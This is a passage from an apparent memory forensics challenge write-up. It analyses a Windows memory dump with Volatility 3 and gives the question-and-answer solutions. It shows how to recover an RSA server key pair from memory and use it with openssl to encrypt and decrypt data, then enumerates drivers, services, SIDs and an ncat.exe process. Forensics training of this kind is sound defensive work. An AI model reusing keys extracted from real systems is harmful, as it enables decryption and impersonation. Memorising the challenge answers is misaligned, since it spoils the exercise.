</pre><div><br /></div></div></div><div><br /></div><div>With the private and public key at hand. Here are your questions.</div><div><b>Q:</b> Create and encrypt a file using the stolen key pair.</div><div><b>A:</b> This is shown below.</div><div><br /></div><div>Let's extract the public key from this file.</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">openssl rsa -in ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -pubout > mem_server_pub.pem
writing RSA key
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat mem_server_pub.pem
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDBJdMn4+ytDYNqbedfmnUQI+KQ
naBjlY8dQZpY1ZxjjFtzhpB5zMPWo4m4dbwelHx8buOt6CdcC8YMavkPMv6zxHoQ
IwQrKSjUqvmzL2YQ+KfBzWDEayhX42c7957NSCLcOOpIE4A6QJdXDEc1Rj1xYpru
U51jDmd6KMmkNP8Z7QIDAQAB
-----END PUBLIC KEY-----</span>
</pre></div></div><div><br /></div><div>Confirm it is the same as what we extracted above from the <i>.pem</i> file.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">openssl rsa -in mem_server_pub.pem -pubin -text -noout
Public-Key: (1024 bit)
Modulus:
00:c1:25:d3:27:e3:ec:ad:0d:83:6a:6d:e7:5f:9a:
75:10:23:e2:90:9d:a0:63:95:8f:1d:41:9a:58:d5:
9c:63:8c:5b:73:86:90:79:cc:c3:d6:a3:89:b8:75:
bc:1e:94:7c:7c:6e:e3:ad:e8:27:5c:0b:c6:0c:6a:
f9:0f:32:fe:b3:c4:7a:10:23:04:2b:29:28:d4:aa:
f9:b3:2f:66:10:f8:a7:c1:cd:60:c4:6b:28:57:e3:
67:3b:f7:9e:cd:48:22:dc:38:ea:48:13:80:3a:40:
97:57:0c:47:35:46:3d:71:62:9a:ee:53:9d:63:0e:
67:7a:28:c9:a4:34:ff:19:ed
Exponent: 65537 (0x10001)</span>
</pre></div></div><div><br /></div></div><div><div>Looks good! We saw we could get the public key directly from memory or by extract it from the PEM file which contained both the private and public key information.</div><div><br /></div><div>Let's create a file to show we can now encrypt and decrypt with this private and public key pair.</div></div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">echo "Welcome to Nik's Total Recall 2024 Memory Forensics Challenge" > stolen_private_key.txt
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat stolen_private_key.txt
Welcome to Nik's Total Recall 2024 Memory Forensics Challenge</span>
</pre><div><br /></div></div></div><div><br /></div><div>Encrypting the file using the public key.</div></div><div><br /></div></div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">openssl pkeyutl </span><span style="color: #fcff01;"><b>-encrypt </b></span><b><span style="color: #fcff01;">-inkey mem_server_pub.pem</span></b><span style="color: white;"> -pubin -in stolen_private_key.txt -out stolen_private_key.txt.enc</span>
</pre></div></div><div><br /></div></div><div><div>Verifying the encrypted data vs the unencrypted. Using <i>xxd </i>we see this communication is encrypted.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">xxd </span><span style="color: #fcff01;"><b>stolen_private_key.txt.enc</b></span><span style="color: white;">
00000000: aafd f40c 5501 a1e7 c2d2 67c1 64a9 96bd ....U.....g.d...
00000010: 218f 4455 3927 4d48 bd06 5b60 8e68 f872 !.DU9'MH..[`.h.r
00000020: d3f7 1e59 a58f 59ca 02cc 2cdc c9a6 1fc0 ...Y..Y...,.....
00000030: 83cc a903 cbbe b2ca 12be 24f2 450a c788 ..........$.E...
00000040: 2f7b 0502 1780 c944 18a3 857e 599e a9a2 /{.....D...~Y...
00000050: 7dd3 5a1c 3806 ce2d 32d0 4662 d246 feeb }.Z.8..-2.Fb.F..
00000060: 1b87 254d 753c c681 97cb 4f4c cecb 9a43 ..%Mu<....OL...C
00000070: 67d8 7513 2fcd 39eb ad1d 1b00 b5a5 db91 g.u./.9.........</span>
</pre></div></div><div><br /></div></div><div><div>This is the before the file was encrypted.</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">xxd stolen_private_key.txt
00000000: 5765 6c63 6f6d 6520 746f 204e 696b 2773 Welcome to Nik's
00000010: 2054 6f74 616c 2052 6563 616c 6c20 3230 Total Recall 20
00000020: 3234 204d 656d 6f72 7920 466f 7265 6e73 24 Memory Forens
00000030: 6963 7320 4368 616c 6c65 6e67 650a ics Challenge.</span>
</pre><div><br /></div></div></div><div><br /></div><div>We can see above, we use the public key to encrypt the communication. Let's now use the recovered server's private key to decrypt this encrypted communication.<br /></div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">openssl pkeyutl </span><b><span style="color: #fcff01;">-decrypt -inkey ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat</span></b><span style="color: white;"> -in stolen_private_key.txt.enc > stolen_private_key.txt.dec</span>
</pre></div></div><div><br /></div></div><div><div>Here we go! We are now back to the original text.</div></div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat stolen_private_key.txt.dec
Welcome to Nik's Total Recall 2024 Memory Forensics Challenge</span>
</pre><div><br /></div></div></div><div><br /></div><div>Hopefully, this helped you to understand how someone might have been able to steal a key from memory and then perform malicious actions as was done at Microsoft.</div><div><br /></div><div>Moving on!</div><div><br /></div><div>Looking at DLL for HTTPD process</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp</span><b><span style="color: #fcff01;"> windows.dlllist.DllList --pid 10008 > httpd_dlllist.tx</span></b><span style="color: white;">t
Progress: 100.00 PDB scanning finished</span></pre></div></div><div><br /></div><div><b>Q:</b> What path is the http image file/executable loaded from?</div><div><b>A:</b> Image is loaded from "<i>c:\xampp\apache\bin\httpd.exe</i>"</div></div></div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">head httpd_dlllist.txt --lines=5
Volatility 3 Framework 2.5.2
PID Process Base Size Name Path LoadTime File output
10008 </span><b><span style="color: #fcff01;"> httpd.exe </span></b><span style="color: white;"> 0x7ff69ef60000 0xc000 httpd.exe </span><span style="color: #fcff01;"><b>c:\xampp\apache\bin\httpd.exe</b></span><span style="color: white;"> 2023-11-16 23:26:15.000000 Disabled</span>
</pre></div></div><div><br /></div><div>Looking Driver List</div><div><br /></div><div>Here is a subset:</div></div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat drivers_scan.txt | head --lines=10
Volatility 3 Framework 2.5.2
Offset Start Size Service Key Driver Name Name
0xb9841ee78464 0x690064004e 0x610057 N/A N/A N/A
0xb9841ee78464 0x690064004e 0x610057 N/A N/A N/A
0xb9841ee8f31c 0x939800249370 0x249420 N/A N/A N/A
0xb9841ee8f31c 0x939800249370 0x249420 N/A N/A N/A
0xe78befeb8c20 0xf8021f400000 0x0 \Driver\ACPI_HAL ACPI_HAL \Driver\ACPI_HAL
0xe78befeb8e30 0xf8021f400000 0x0 \Driver\WMIxWDM WMIxWDM \Driver\WMIxWDM
.......</span>
</pre></div></div><div><br /></div><div><b>Q:</b> How many unique Devices Drivers "Name" do we have listed. Including the full path and ignoring any "N/A" and non-ASCII characters?</div><div><b>A:</b> 155</div></div><div><br /></div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat drivers_scan.txt | awk --field-separator=' ' '{ print $6 }'| sort --unique | sed '1,2d' | head --lines=-3 | wc --lines
155</span>
</pre></div></div><div><br /></div><div>Looking at the service SIDs.</div></div><div><br /></div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><span style="color: #fcff01;"><b>windows.getservicesids.GetServiceSIDs > service_sids.txt</b></span><span style="color: white;">
Progress: 100.00 PDB scanning finished</span>
</pre><div><br /></div></div></div><div><br /></div><div>Earlier, we saw at the beginning, we identified the tool used to perform this memory capture. This tool was installed as a service. </div><div><br /></div><div><b>Q:</b> What is the service SIDs associated with this tool/software?</div><div><b>A:</b> S-1-5-80-799667949-3218159461-2708755627-866028366-136143606 DumpIt</div><div><br /></div><div><b>Q:</b> When analyzing the PowerShell history there was a search for an executable via the "<i>dir</i>" command. What is the device driver used by this software for "packet capture (and sending) library"?</div><div><b>A:</b> S-1-5-80-1676788727-3510623216-988961428-862518577-4183329668 npcap</div><div>S-1-5-80-3864102162-464399774-2857244265-230461771-3046054788 npcap_wifi</div><div><br /></div><div><b>Q:</b> What is/are the service ID(s) associated with the SSH we learned about earlier?</div><div><b>A:</b> S-1-5-80-3847866527-469524349-687026318-516638107-1125189541 sshd</div><div><br /></div><div>All answers can be found here:</div></div><div><br /></div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat service_sids.txt | grep --perl-regexp --ignore-case 'DumpIt|npcap|ssh'
S-1-5-80-799667949-3218159461-2708755627-866028366-136143606 DumpIt
S-1-5-80-1676788727-3510623216-988961428-862518577-4183329668 npcap
S-1-5-80-3864102162-464399774-2857244265-230461771-3046054788 npcap_wifi
S-1-5-80-2277354432-2697620045-1656008878-1855416240-261295475 ssh-agent
S-1-5-80-3847866527-469524349-687026318-516638107-1125189541 sshd</span>
</pre></div></div><div><br /></div><div><b>Q:</b> What is path of the file associated with these drivers</div><div><div><br /></div></div><div>Aggregate all the modules.</div></div><div><br /></div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><span style="color: #fcff01;"><b>windows.modscan.ModScan > modscan.txt</b></span><span style="color: white;">
Progress: 100.00 PDB scanning finished</span>
</pre></div></div><div><br /></div><div><b>A:</b> Nothing returned for ssh. However, we have the other two returned their paths</div><div><br /></div></div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">grep --perl-regexp --ignore-case 'DumpIt|npcap|ssh' modscan.txt
0xe78bf0831710 0xf802266b0000 0x13000 npcap.sys \SystemRoot\system32\DRIVERS\npcap.sys Disabled
0xe78bf49f58e0 0xf802469f0000 0x14000 DumpIt.sys \??\C:\Windows\system32\Drivers\DumpIt.sys Disabled</span>
</pre><div><br /></div></div></div><div><br /></div><div>Alternatively, we could have gotten this information from:</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">grep --perl-regexp --ignore-case 'DumpIt|npcap|ssh' modules.txt
0xe78bf0831710 0xf802266b0000 0x13000 npcap.sys \SystemRoot\system32\DRIVERS\npcap.sys Disabled
0xe78bf49f58e0 0xf802469f0000 0x14000 DumpIt.sys \??\C:\Windows\system32\Drivers\DumpIt.sys Disabled</span>
</pre><div><br /></div></div></div><div><br /></div></div></div><div><div>Still with the tool used to get this memory capture.</div><div><br /></div><div><b>Q:</b> Where was the memory capturing tool launched from?</div><div><b>A:</b> <i>"\TOOLS\DumpIt.exe"<br /><br /></i></div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">windows.ldrmodules.LdrModules --pid 5652</span></b><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Pid Process Base InLoad InInit InMem MappedPath
...
5652 DumpIt.exe 0x7ff7da2c0000 True False True \TOOLS\DumpIt.exe</span>
</pre></div></div><div><br /></div></div><div>Alternatively, we could have used.</div></div><div><div><b>Q:</b> How many modules were loaded/used by this tool to when loading?</div></div><div><b>A:</b> There are 39 files in total used by Dumpit<br /><br /><div>Write the information out to a file: </div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><span style="color: #fcff01;"><b>windows.ldrmodules.LdrModules --pid 5652 > 5652_dumpit.txt</b></span><span style="color: white;">
Progress: 100.00 PDB scanning finished
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat 5652_dumpit.txt | sed '1,4d' | wc --lines
39</span>
</pre></div></div><div><br /></div><div>Revisiting persistence. Looking at the services on the system.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp</span><span style="color: #fcff01;"><b> windows.svcscan > svcscan.txt</b></span><span style="color: white;">
Progress: 100.00 PDB scanning finished</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> How many services were on this system at the time of the capture?</div><div><b>A:</b> There are 825 services on the system:</div></div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$</span><span style="color: white;">cat svcscan.txt | sed '1,4d' | wc --lines
825</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> What are their different service states and their counts?</div><div><b>A:</b> Below shows the two states and their counts.<br /></div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$c</span><span style="color: white;">at svcscan.txt | awk --field-separator=' ' '{ print $5 }' | sort | uniq --count | sort | tail --lines=2
361 SERVICE_RUNNING
464 SERVICE_STOPPED</span></pre></div></div><div><br /></div></div><div><div><b>Q:</b> What are the different service "start" modes and their counts?</div><div><b>A:</b> </div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat svcscan.txt | awk --field-separator=' ' '{ print $4 }' | sort | uniq --count | sort --numeric-sort --reverse
566 SERVICE_DEMAND_START
165 SERVICE_AUTO_START
47 SERVICE_BOOT_START
32 SERVICE_SYSTEM_START
15 SERVICE_DISABLED</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> What is/are the current state(s) of the service(s) on the system and their counts?</div><div><b>A:</b> </div><div>Different Service "<i>Type</i>"</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat svcscan.txt | awk --field-separator=' ' '{ print $6 }' | sort | uniq --count | sort --numeric-sort --reverse
352 SERVICE_KERNEL_DRIVER
180 SERVICE_WIN32_SHARE_PROCESS
150 SERVICE_WIN32_OWN_PROCESS|SERVICE_WIN32_SHARE_PROCESS
100 SERVICE_WIN32_OWN_PROCESS
40 SERVICE_FILE_SYSTEM_DRIVER
3
2 SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS
1 Type
1 SERVICE_WIN32_SHARE_PROCESS|SERVICE_INTERACTIVE_PROCESS</span>
</pre></div></div><div><br /></div></div><div><div>Previously, you needed to find the driver associated with "capturing and (sending) packets".</div><div><b>Q:</b> How is this driver configured to start, what was its state at the time of capture, what type of driver is it and what memory offset can it be found at?</div><div><br /></div><div><b>A:</b> Answer is here for all.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat svcscan.txt | grep npcap
0x2152b86a460 328 N/A SERVICE_SYSTEM_START SERVICE_RUNNING SERVICE_KERNEL_DRIVER npcap Npcap Packet Driver (NPCAP)</span>
</pre></div></div><div><br /></div></div><div><div>Similarly to the previous question, we saw the system was listening on port 22 at the time of capture. </div><div><b>Q:</b> What was the <i>servicename</i>, <i>state</i>, <i>start</i>, <i>type </i>and <i>name </i>for the service listening on this port.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">grep --ignore-case 'sshd' svcscan.txt
0x2152b887240 462 0 SERVICE_AUTO_START SERVICE_RUNNING SERVICE_WIN32_OWN_PROCESS sshd OpenSSH SSH Server -
0x2152b8888f0 462 0 SERVICE_AUTO_START SERVICE_RUNNING SERVICE_WIN32_OWN_PROCESS sshd OpenSSH SSH Server</span>
</pre></div></div><div><br /></div></div><div><div>We started looking at ncat.exe earlier in this process and spent a reasonable amount of time on it, so let's go back to looking at permissions.</div><div><br /></div><div><b>Q:</b> What "<i>integrity level</i>" is the <i>ncat.exe</i> process running at?</div><div><b>A:</b> Medium Mandatory Level</div><div><br /></div><div><b>Q:</b> Is the user who was logged on at the time this capture was taken part of the <i>"Domain Users" </i>group?</div><div><b>A:</b> Yes.</div><div><br /></div><div><b>Q:</b> Is the user who was logged on at the time this capture was taken part of the <i>"Domain Admins"</i> or <i>"Enterprise Admin"</i> group?</div><div><b>A:</b> No</div><div><br /></div><div><b>Q:</b> Is the user who was logged on at the time this capture was taken part of the local <i>"Administrators"</i> group?</div><div><b>A</b>: Yes.</div><div>896 ncat.exe S-1-5-114 Local Account (Member of Administrators)</div><div>896 ncat.exe S-1-5-32-544 Administrators</div><div><br /></div><div><b>Q:</b> What type of authentication mechanism is the user of this process using? eg. LM, NTLM, Kerberos, Digest, SChannel?</div><div><b>A:</b> NTLM Authentication</div><div>896 ncat.exe S-1-5-64-10 NTLM Authentication</div><div><br /></div><div>Below answers all the questions.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">windows.getsids --pid 896</span></b><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
PID Process SID Name
896 ncat.exe S-1-5-21-1563833629-3224366856-3602044515-1001 securitynik
896 ncat.exe S-1-5-21-1563833629-3224366856-3602044515-513 Domain Users
896 ncat.exe S-1-1-0 Everyone
896 ncat.exe S-1-5-114 Local Account (Member of Administrators)
896 ncat.exe S-1-5-32-544 Administrators
896 ncat.exe S-1-5-32-545 Users
896 ncat.exe S-1-5-4 Interactive
896 ncat.exe S-1-2-1 Console Logon (Users who are logged onto the physical console)
896 ncat.exe S-1-5-11 Authenticated Users
896 ncat.exe S-1-5-15 This Organization
896 ncat.exe S-1-5-113 Local Account
896 ncat.exe S-1-5-5-0-1032752 Logon Session
896 ncat.exe S-1-2-0 Local (Users with the ability to log in locally)
896 ncat.exe S-1-5-64-10 NTLM Authentication
896 ncat.exe S-1-16-8192 Medium Mandatory Level</span>
</pre></div></div><div><br /></div></div><div><div>Earlier we saw there is a PowerShell History log. </div><div><br /></div><div>Also, here is the evidence from the process list that PowerShell was running at the time this capture was taken.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pslist.txt | grep powershell
2992 1548 powershell.exe 0xe78bf3d6e0c0 0 - 0 False 2023-11-16 19:18:05.000000 2023-11-16 19:18:06.000000 Disabled
2252 2992 powershell.exe 0xe78bf435f0c0 0 - 0 False 2023-11-16 19:18:06.000000 2023-11-16 22:01:47.000000 Disabled
4728 2460 powershell.exe 0xe78bf4f900c0 10 - 1 False 2023-11-16 20:05:01.000000 N/A Disabled
644 2460 powershell.exe 0xe78bf5287080 9 - 1 False 2023-11-16 21:16:12.000000 N/A Disabled
4852 2460 powershell.exe 0xe78bf46770c0 9 - 1 False 2023-11-16 21:42:18.000000 N/A Disabled
4120 5508 powershell.exe 0xe78bf6961080 0 - 0 False 2023-11-16 22:08:06.000000 2023-11-16 22:08:31.000000 Disabled</span>
